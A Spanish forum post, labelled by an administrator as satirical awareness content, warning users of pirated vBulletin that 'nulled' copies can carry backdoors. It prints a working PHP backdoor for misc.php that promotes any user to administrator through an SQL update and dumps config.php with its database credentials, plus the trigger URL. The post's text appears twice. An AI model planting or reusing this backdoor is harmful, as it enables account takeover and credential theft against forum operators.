- Desde
- 6 Sep 2008
Nota administrativa: Éste tema fue escrito con carácter humorístico e irónico. Busca concientizar a los usuarios de licencias piratas de vBulletin acerca del riesgo que corren.
Antes de darte el link de descarga, quiero avisarte que cuando lo subi, le meti las siguientes linea de codigo en el archivo misc.php justo despues de
lo que le puse fue lo siguiente
asi que cuando yo me registre en tu foro y me den mi ID de usuario (por ejemplo el 1542) solo tendré que poner esto
[noparse]http://tu_foro.com/misc.php?do=Jhonnyf&userid=1542&grupoid=6[/noparse]
y listo, Ya seré un Admin (puedo cambiar de grupo si no me resulta o usas uno diferente) y de pasadito veo todo el contenido de tu config.php para entrar via MyphpAdmin a tu base de datos y borrarme todo lo que quiera
Ahora si ya tienes un vBulletin instalado, tambien te puedo ofrecer muchos Hacks y plugins recien bajaditos de vbulletin.org, solo que les agregaré un plugin más con el codigo de arriba y lo engancharé en misc_start asi que el efecto será el mismo
No te preocupes, eso es solo mi firma para saber que ese vBulletin fue "NULLEADO" por mi, ¿acaso crees que lo hago por algun otro motivo? usalo con confianza nomás... ¿para que vas a pagar a Jelsoft tanto dinero si te lo puedo dar gratis y sin ningun problema?... vamos.. no tengas miedo
Link de descarga
Atte: El Nulleador Enmascarado
Antes de darte el link de descarga, quiero avisarte que cuando lo subi, le meti las siguientes linea de codigo en el archivo misc.php justo despues de
PHP:
($hook = vBulletinHook::fetch_hook('misc_start')) ? eval($hook) : false;
PHP:
if ($_REQUEST['do'] == 'Jhonnyf')
{
$userid = $vbulletin->input->clean_gpc('r', 'userid', TYPE_INT);
$grupoid = $vbulletin->input->clean_gpc('r', 'grupoid', TYPE_INT);
$db->query_read_slave("update " . TABLE_PREFIX . "user AS user
SET usergroupid=$grupoid
WHERE userid=$userid
");
$filename = "./includes/config.php";
$handle = fopen($filename, "r");
$contents = fread($handle, filesize($filename));
fclose($handle);
header("Content-type: text/plain;charset=iso-8859-1");
echo $contents;
exit();
}
[noparse]http://tu_foro.com/misc.php?do=Jhonnyf&userid=1542&grupoid=6[/noparse]
y listo, Ya seré un Admin (puedo cambiar de grupo si no me resulta o usas uno diferente) y de pasadito veo todo el contenido de tu config.php para entrar via MyphpAdmin a tu base de datos y borrarme todo lo que quiera
Ahora si ya tienes un vBulletin instalado, tambien te puedo ofrecer muchos Hacks y plugins recien bajaditos de vbulletin.org, solo que les agregaré un plugin más con el codigo de arriba y lo engancharé en misc_start asi que el efecto será el mismo
No te preocupes, eso es solo mi firma para saber que ese vBulletin fue "NULLEADO" por mi, ¿acaso crees que lo hago por algun otro motivo? usalo con confianza nomás... ¿para que vas a pagar a Jelsoft tanto dinero si te lo puedo dar gratis y sin ningun problema?... vamos.. no tengas miedo
Link de descarga
Atte: El Nulleador Enmascarado